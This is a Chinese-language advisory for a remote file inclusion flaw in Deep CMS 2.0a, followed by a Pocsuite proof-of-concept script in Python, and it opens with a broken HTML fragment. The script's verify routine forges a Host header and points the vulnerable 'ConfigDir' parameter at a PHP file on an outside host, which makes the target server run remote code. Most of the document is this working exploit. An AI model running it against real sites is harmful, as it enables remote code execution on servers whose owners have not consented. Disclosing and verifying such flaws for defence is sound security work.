http:/...">
Deep CMS是一款基于PHP的内容管理程序。
Deep CMS不正确过滤用户提交的URI数据,远程攻击者可以利用漏洞以WEB进程权限执行任意命令。
问题是由于’index.php’脚本对用户提交的’ConfigDir’参数缺少过滤,提交恶意的远程服务器作为包含对象,可导致以WEB进程权限执行任意PHP代码。
Deep CMS Deep CMS 2.0a
目前没有详细解决方案提供,请关注以下链接:
<a href=“http://wapcms.ru/” target=“_blank”>http://wapcms.ru/</a>
#!/usr/bin/env python
# coding: utf-8
from pocsuite.net import req
from pocsuite.poc import POCBase, Output
from pocsuite.utils import register
import re
class TestPOC(POCBase):
vulID = '1118' # ssvid
version = '1.0'
author = ['Disorder']
vulDate = ''
createDate = '2016-01-06'
updateDate = '2016-01-06'
references = ['http://www.sebug.net/vuldb/ssvid-1118']
name = 'Deep CMS Index.PHP远程文件包含漏洞'
appPowerLink = 'http://www.deep-cms.ru/'
appName = 'Deep CMS'
appVersion = 'Deep CMS 2.0a'
vulType = 'Remote File Inclusion'
desc = '''
Deep CMS是一款基于PHP的内容管理程序。 Deep CMS不正确过滤用户提交的URI数据,远程攻击者可以利用漏洞以WEB进程权限执行任意命令。 问题是由于'index.php'脚本对用户提交的'ConfigDir'参数缺少过滤,提交恶意的远程服务器作为包含对象,可导致以WEB进程权限执行任意PHP代码。
'''
samples = ['']
def _attack(self):
result = {}
return self.parse_output(result)
def _verify(self):
#利用/change_preferences2.php文件验证RFI漏洞
result = {}
#<?php echo md5('3.1416');?>
payload='http://tool.scanv.com/wsl/php_verify.txt?'
#测试用的payload
vulurl='{url}/index.php?ConfigDir={evil}'.format(url=self.url,evil=payload)
#伪造的HTTP头
httphead = {
'Host':'www.google.com',
'User-Agent':'Mozilla/5.0 (Windows NT 6.2; rv:16.0) Gecko/20100101 Firefox/16.0',
'Accept':'text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8',
'Connection':'keep-alive'
}
#发送测试请求
resp=req.get(vulurl,headers=httphead,timeout=50)
#md5('3.1416')=d4d7a6b8b3ed8ed86db2ef2cd728d8ec
match = re.search('d4d7a6b8b3ed8ed86db2ef2cd728d8ec', resp.content)
#如果成功匹配到md5('3.1416'),证明漏洞验证成功
if match:
#返回测试信息
result['VerifyInfo'] = {}
result['VerifyInfo']['URL'] = self.url
return self.parse_output(result)
def parse_output(self, result):
#parse output
output = Output(self)
if result:
output.success(result)
else:
output.fail('Internet nothing returned')
return output
register(TestPOC)